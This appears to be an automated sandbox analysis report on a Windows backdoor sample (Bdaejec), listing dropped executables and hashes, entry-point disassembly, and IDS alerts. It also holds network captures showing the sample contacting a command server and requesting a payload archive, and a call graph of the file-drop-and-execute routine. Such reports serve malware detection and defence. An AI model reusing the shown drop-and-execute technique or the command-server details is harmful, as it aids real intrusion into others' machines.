                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.978554483895827
                            Encrypted:false
                            SSDEEP:96:Q1For9Is65hn677afzQXIDcQZc6dcE1cw36DC+HbHg/5ksS/YyNl1zWDUMsIqLOW:4U9IC0HZPO3j0/hXzuiFJZ24IO85
                            MD5:7A96C12D72C03492D4F3A589C7980E2F
                            SHA1:05982F647B76FA700797DFF964B85A1407200AD6
                            SHA-256:4342822CD962BAF324C16FB714CC2C246D2871E1597A7EC4871C4EED6D4C6125
                            SHA-512:CBD83B7368A2128FCACB1F771B5F5CCD5DAA5E66E04B04402F0184B0721C912C184CCB3E1BAC287C8E056ADF8B5B8A26D729749B0F7488E696133C624F75DCD9
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.5.8.7.0.4.9.8.1.5.2.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.5.8.7.0.5.4.9.7.1.5.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.8.f.4.6.6.4.-.8.6.1.1.-.4.e.d.f.-.b.5.0.1.-.4.b.c.5.3.d.6.6.3.c.d.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.6.0.d.c.0.b.-.f.0.8.3.-.4.3.3.0.-.b.c.b.d.-.2.8.3.a.a.7.1.a.b.2.c.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.b.Q.T.K.R.D.g...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.c.-.0.0.0.1.-.0.0.1.5.-.1.f.3.4.-.0.8.2.1.1.b.5.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.9.7.8.4.0.f.f.6.1.a.8.2.a.5.7.8.d.0.0.c.7.b.1.5.8.1.2.9.9.9.4.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.r.b.Q.T.K.R.D.g...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Sat Dec 28 11:25:05 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):150028
                            Entropy (8bit):1.9016993861084925
                            Encrypted:false
                            SSDEEP:768:Ny5J/ptF2MV98QD3cH4y18JDWSKqy8Xliev6TN:IUQ8qY4y8DWSKqy8Xliev6TN
                            MD5:F25F36239298DE6D5A9AFA88F1711B68
                            SHA1:E1F704E452F3F242740E13FF907A51079032514E
                            SHA-256:0B90539554DACCE82156179F0295CDFF209B65722E68B5F9A0E914DE4FED263C
                            SHA-512:2F21473FDE3327F2BD9D0541EDA62059EBB65DC5632D9FFB3403F2658A5E2EF3A6420F6480C0B0F4573E53A68AAC7F739D8A8768A385CE8EF16F9FB8B64123C2
                            Malicious:false
                            Reputation:low
                            Preview:MDMP..a..... .........og............D...............X.......<...$ ......4....M..........`.......8...........T............=..l...........` ..........L"..............................................................................eJ......."......GenuineIntel............T.............og.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):6280
                            Entropy (8bit):3.724784057292081
                            Encrypted:false
                            SSDEEP:96:RSIU6o7wVetbWI6B8lYGtqlg5aMQU+89bPJrEsfQ9JTm:R6l7wVeJWI6B8lYGtlpD+89b9EsfQ/m
                            MD5:F9342BB58F440C76AC8740B1ED183E77
                            SHA1:AFEB8E9D711639076EE1F4D84A5993950A1FA36E
                            SHA-256:2E66052D5936CC57FB0241A82D81FC10C614589B94A2A3F35309A55703775BC8
                            SHA-512:21D12F5B35303D687DC9F751F659D0065DB2C53F22F9271B29AADD7519207CA0042BE06C63165147D3562A84B8F10AC88D935AC7F055BB41EE04DB9331FCBDCC
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.8.0.<./.P.i.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4565
                            Entropy (8bit):4.462262222448951
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zs5rJg77aI9VKWpW8VYbYm8M4JcOFH4+q8acW1gSWd:uIjfrI7fr7V/Jt40W1gSWd
                            MD5:5A4264EA11AF32D1E9A1136778353807
                            SHA1:C0A57E853EB304282AD5336974B5CDCE58AE6B3F
                            SHA-256:00257CC765D4437998D1F47265F215A5CC9AD83EAE5F56C18D906D511480F575
                            SHA-512:4B3C1074C477100C1F46A3516AD781626B4BFDB2A4819CF866D61071FA8F25730FCEDE49609DD3C92932FE5C0195308B07891E363DCCE93FBC076386DD8DEE94
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="651027" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):1.5
                            Encrypted:false
                            SSDEEP:3:Nv:9
                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                            Malicious:false
                            Preview:foo.
                            Process:C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):1.5
                            Encrypted:false
                            SSDEEP:3:Nv:9
                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                            Malicious:false
                            Preview:foo.
                            Process:C:\Users\user\Desktop\aRxo3E278B.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):15872
                            Entropy (8bit):7.031113762428177
                            Encrypted:false
                            SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                            MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                            SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                            SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                            SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 97%
                            Joe Sandbox View:
                            • Filename: gT6IitwToH.exe, Detection: malicious, Browse
                            • Filename: #U65b0#U7248#U7f51#U5173.exe, Detection: malicious, Browse
                            • Filename: #U8865#U4e01#U6253#U5305.exe, Detection: malicious, Browse
                            • Filename: #U65b0#U7248#U7f51#U5173Srv.exe, Detection: malicious, Browse
                            • Filename: gE4NVCZDRk.exe, Detection: malicious, Browse
                            • Filename: ib.exe, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, Detection: malicious, Browse
                            • Filename: 8VB4lVuZk3.exe, Detection: malicious, Browse
                            • Filename: biKy3nZEyJ.exe, Detection: malicious, Browse
                            • Filename: biKy3nZEyJ.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.4690238645278715
                            Encrypted:false
                            SSDEEP:6144:AzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNvjDH5Sq:WZHtBZWOKnMM6bFp5j4
                            MD5:74E8D4DE375033394F964ADF305BEF8A
                            SHA1:BE3A9C29B651426F9640DACB55AD3E332F2B627D
                            SHA-256:A13F2CB25D9BA9D0BA73701735902818C864D09726B992FCC27C2690E03BDA49
                            SHA-512:3BC3941FEB006C7E0002CAC50CE3DB0DEAE8365DA742B5B35E4FC021A41A7898AA338DEBC54619A240DE7F444358C0A360A26417BC6D2E71098A5B66839BB782
                            Malicious:false
                            Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv.c".Y................................................................................................................................................................................................................................................................................................................................................u.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.575804896870382
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:aRxo3E278B.exe
                            File size:82'432 bytes
                            MD5:93bc13a5ccf808ac29d512748221ce1d
                            SHA1:bff2313cab29f6301d4131eb2f211d4b26743a90
                            SHA256:65214c3035c0f49f04a69d0c23f90f5b2b0135b706991ce5a9842fc6e4a077ed
                            SHA512:342d40e8b5cce907f02123c1eec89bc18233468a7c7bba7c3b180de4a05fdc1996d509545129db8e9207cfa70b8eced8798633f6ce82c75c399a680bb655da37
                            SSDEEP:1536:Yg/6/tM8NXDjPX0QWlfGMckTQwZGCq2iW7z:Hk3U8kTQUGCH
                            TLSH:88838D61B980C073C44A6079441DC7B19F7FBC3126B5C997BB960BBB5F313D1EA2A24A
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S...2...2...2.......2...2...2...}8..2...`*..2...`;..2...`-..2...`?..2..Rich.2..........................PE..L......Q...........
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0x414000
                            Entrypoint Section:wu
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x518BB101 [Thu May 9 14:21:53 2013 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:0
                            File Version Major:5
                            File Version Minor:0
                            Subsystem Version Major:5
                            Subsystem Version Minor:0
                            Import Hash:ba2c974ed567c90fe365844af978f320
                            Instruction
                            push ebp
                            mov ebp, esp
                            sub esp, 0000016Ch
                            xor eax, eax
                            push ebx
                            push esi
                            push edi
                            mov dword ptr [ebp-24h], eax
                            mov dword ptr [ebp-10h], eax
                            mov dword ptr [ebp-14h], eax
                            mov dword ptr [ebp-08h], eax
                            mov dword ptr [ebp-0Ch], eax
                            mov dword ptr [ebp-20h], eax
                            mov dword ptr [ebp-18h], eax
                            mov dword ptr [ebp-48h], 54516272h
                            mov dword ptr [ebp-44h], 6744524Bh
                            mov dword ptr [ebp-40h], 6578652Eh
                            mov dword ptr [ebp-3Ch], 00000000h
                            call 00007F2E1C6A66A5h
                            pop eax
                            add eax, 00000225h
                            mov dword ptr [ebp-04h], eax
                            mov eax, dword ptr fs:[00000030h]
                            mov dword ptr [ebp-28h], eax
                            mov eax, dword ptr [ebp-04h]
                            mov dword ptr [eax], E904C483h
                            mov eax, dword ptr [ebp-04h]
                            mov dword ptr [eax+04h], FFFEE3A2h
                            mov eax, dword ptr [ebp-28h]
                            mov eax, dword ptr [eax+0Ch]
                            mov eax, dword ptr [eax+1Ch]
                            mov eax, dword ptr [eax]
                            mov eax, dword ptr [eax+08h]
                            mov ecx, dword ptr [eax+3Ch]
                            mov ecx, dword ptr [ecx+eax+78h]
                            add ecx, eax
                            mov edi, dword ptr [ecx+1Ch]
                            mov ebx, dword ptr [ecx+20h]
                            mov esi, dword ptr [ecx+24h]
                            mov ecx, dword ptr [ecx+18h]
                            add esi, eax
                            add edi, eax
                            add ebx, eax
                            xor edx, edx
                            mov dword ptr [ebp-30h], esi
                            mov dword ptr [ebp-1Ch], edx
                            mov dword ptr [ebp-34h], ecx
                            cmp edx, dword ptr [ebp-34h]
                            jnc 00007F2E1C6A67EEh
                            movzx ecx, word ptr [esi+edx*2]
                            mov edx, dword ptr [ebx+edx*4]
                            mov esi, dword ptr [edi+ecx*4]
                            add edx, eax
                            mov ecx, dword ptr [edx]
                            add esi, eax
                            cmp ecx, 4D746547h
                            jne 00007F2E1C6A66F4h
                            cmp dword ptr [edx+04h], 6C75646Fh
                            jne 00007F2E1C6A66EBh
                            Programming Language:
                            • [IMP] VS2005 build 50727
                            • [C++] VS2008 build 21022
                            • [ASM] VS2008 build 21022
                            • [ C ] VS2008 build 21022
                            • [LNK] VS2008 build 21022
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xf9340x28.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf4880x40.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xe0000x140.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000xc9ed0xca009c1449c399f02a55d49d67dd9413e89cFalse0.6139193997524752data6.618135871473556IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0xe0000x20680x2200c3c323d1b4244bb08b2144d7f6ccb84fFalse0.349609375data5.290951954639895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x110000x2bc40x10003ecb8d5c354d07019fd9bd96c5e5f3a1False0.20947265625data2.251287542215587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            wu0x140000x50000x4200e9a58420079dcf44dda5ea022fb2bb95False0.7772845643939394data6.935419512952454IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            DLLImport
                            KERNEL32.dllGenerateConsoleCtrlEvent, GetExitCodeProcess, WaitForSingleObject, CreateProcessA, SetConsoleCtrlHandler, GetModuleFileNameA, EnterCriticalSection, LeaveCriticalSection, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, GetCommandLineA, GetStartupInfoA, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLastError, HeapFree, HeapAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, HeapReAlloc, VirtualAlloc, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, HeapSize, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA, CompareStringA, CompareStringW, SetEnvironmentVariableA, ReadFile, SetEndOfFile, GetProcessHeap, GetFileAttributesA
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-12-28T12:25:00.452922+01002838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup1192.168.2.6521591.1.1.153UDP
                            2024-12-28T12:25:01.831265+01002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.64970744.221.84.105799TCP
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 28, 2024 12:25:00.602969885 CET49707799192.168.2.644.221.84.105
                            Dec 28, 2024 12:25:00.722551107 CET7994970744.221.84.105192.168.2.6
                            Dec 28, 2024 12:25:00.722856998 CET49707799192.168.2.644.221.84.105
                            Dec 28, 2024 12:25:00.723174095 CET49707799192.168.2.644.221.84.105
                            Dec 28, 2024 12:25:00.842649937 CET7994970744.221.84.105192.168.2.6
                            Dec 28, 2024 12:25:01.831170082 CET7994970744.221.84.105192.168.2.6
                            Dec 28, 2024 12:25:01.831214905 CET7994970744.221.84.105192.168.2.6
                            Dec 28, 2024 12:25:01.831264973 CET49707799192.168.2.644.221.84.105
                            Dec 28, 2024 12:25:01.831321955 CET49707799192.168.2.644.221.84.105
                            Dec 28, 2024 12:25:01.835760117 CET49707799192.168.2.644.221.84.105
                            Dec 28, 2024 12:25:01.879734039 CET7994970744.221.84.105192.168.2.6
                            Dec 28, 2024 12:25:01.879821062 CET49707799192.168.2.644.221.84.105
                            Dec 28, 2024 12:25:01.955235958 CET7994970744.221.84.105192.168.2.6
                            Dec 28, 2024 12:25:05.070470095 CET49708799192.168.2.644.221.84.105
                            Dec 28, 2024 12:25:05.190016985 CET7994970844.221.84.105192.168.2.6
                            Dec 28, 2024 12:25:05.190097094 CET49708799192.168.2.644.221.84.105
                            Dec 28, 2024 12:25:06.095213890 CET7994970844.221.84.105192.168.2.6
                            Dec 28, 2024 12:25:06.095266104 CET49708799192.168.2.644.221.84.105
                            Dec 28, 2024 12:25:06.095510960 CET7994970844.221.84.105192.168.2.6
                            Dec 28, 2024 12:25:06.095567942 CET49708799192.168.2.644.221.84.105
                            Dec 28, 2024 12:25:11.242813110 CET49708799192.168.2.644.221.84.105
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 28, 2024 12:25:00.452922106 CET5215953192.168.2.61.1.1.1
                            Dec 28, 2024 12:25:00.590595961 CET53521591.1.1.1192.168.2.6
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Dec 28, 2024 12:25:00.452922106 CET192.168.2.61.1.1.10xfaf7Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 28, 2024 12:25:00.590595961 CET1.1.1.1192.168.2.60xfaf7No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                            • ddos.dnsnb8.net:799
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.64970744.221.84.1057995580C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
                            TimestampBytes transferredDirectionData
                            Dec 28, 2024 12:25:00.723174095 CET288OUTGET /cj//k1.rar HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: ddos.dnsnb8.net:799
                            Connection: Keep-Alive


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:06:24:59
                            Start date:28/12/2024
                            Path:C:\Users\user\Desktop\aRxo3E278B.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\aRxo3E278B.exe"
                            Imagebase:0x400000
                            File size:82'432 bytes
                            MD5 hash:93BC13A5CCF808AC29D512748221CE1D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:1
                            Start time:06:24:59
                            Start date:28/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
                            Imagebase:0x8f0000
                            File size:15'872 bytes
                            MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 97%, ReversingLabs
                            Reputation:moderate
                            Has exited:true

                            Target ID:6
                            Start time:06:25:04
                            Start date:28/12/2024
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 1384
                            Imagebase:0xf30000
                            File size:483'680 bytes
                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:6.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:4%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:74
                              execution_graph 6970 414000 6972 414044 GetPEB 6970->6972 6973 414077 CreateFileA 6972->6973 6975 414265 6973->6975 6976 41422d 6973->6976 6977 414246 WriteFile 6976->6977 6978 414244 6976->6978 6979 414255 CloseHandle WinExec 6977->6979 6978->6979 6979->6975 9372 405188 9373 405194 __calloc_impl 9372->9373 9374 4051ac 9373->9374 9375 403abd __mtdeletelocks 67 API calls 9373->9375 9405 405296 __calloc_impl 9373->9405 9376 4051ba 9374->9376 9378 403abd __mtdeletelocks 67 API calls 9374->9378 9375->9374 9377 4051c8 9376->9377 9379 403abd __mtdeletelocks 67 API calls 9376->9379 9380 4051d6 9377->9380 9381 403abd __mtdeletelocks 67 API calls 9377->9381 9378->9376 9379->9377 9382 4051e4 9380->9382 9383 403abd __mtdeletelocks 67 API calls 9380->9383 9381->9380 9384 4051f2 9382->9384 9386 403abd __mtdeletelocks 67 API calls 9382->9386 9383->9382 9385 405200 9384->9385 9387 403abd __mtdeletelocks 67 API calls 9384->9387 9388 405211 9385->9388 9389 403abd __mtdeletelocks 67 API calls 9385->9389 9386->9384 9387->9385 9390 403ef9 __lock 67 API calls 9388->9390 9389->9388 9391 405219 9390->9391 9392 405225 InterlockedDecrement 9391->9392 9393 40523e 9391->9393 9392->9393 9395 405230 9392->9395 9408 4052a2 9393->9408 9395->9393 9398 403abd __mtdeletelocks 67 API calls 9395->9398 9397 403ef9 __lock 67 API calls 9399 405252 9397->9399 9398->9393 9400 405283 9399->9400 9401 404d5a ___removelocaleref 8 API calls 9399->9401 9411 4052ae 9400->9411 9406 405267 9401->9406 9404 403abd __mtdeletelocks 67 API calls 9404->9405 9406->9400 9407 404b82 ___freetlocinfo 67 API calls 9406->9407 9407->9400 9414 403e1f LeaveCriticalSection 9408->9414 9410 40524b 9410->9397 9415 403e1f LeaveCriticalSection 9411->9415 9413 405290 9413->9404 9414->9410 9415->9413 6980 402495 7019 40379c 6980->7019 6982 4024a1 GetStartupInfoA 6984 4024c4 6982->6984 7020 4064d7 HeapCreate 6984->7020 6986 402514 7022 4052b7 GetModuleHandleW 6986->7022 6990 402525 __RTC_Initialize 7056 40332b 6990->7056 6991 40246c _fast_error_exit 67 API calls 6991->6990 6993 402533 6994 40253f GetCommandLineA 6993->6994 7148 402164 6993->7148 7071 4063a0 6994->7071 7001 402564 7107 40606d 7001->7107 7003 402164 __amsg_exit 67 API calls 7003->7001 7005 402575 7122 402223 7005->7122 7006 402164 __amsg_exit 67 API calls 7006->7005 7008 40257c 7009 402587 7008->7009 7010 402164 __amsg_exit 67 API calls 7008->7010 7128 40600e 7009->7128 7010->7009 7015 4025b6 7155 402400 7015->7155 7018 4025bb 